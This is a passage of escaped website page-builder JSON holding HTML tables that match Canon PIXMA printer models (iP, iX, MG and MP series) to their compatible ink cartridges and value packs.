Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td 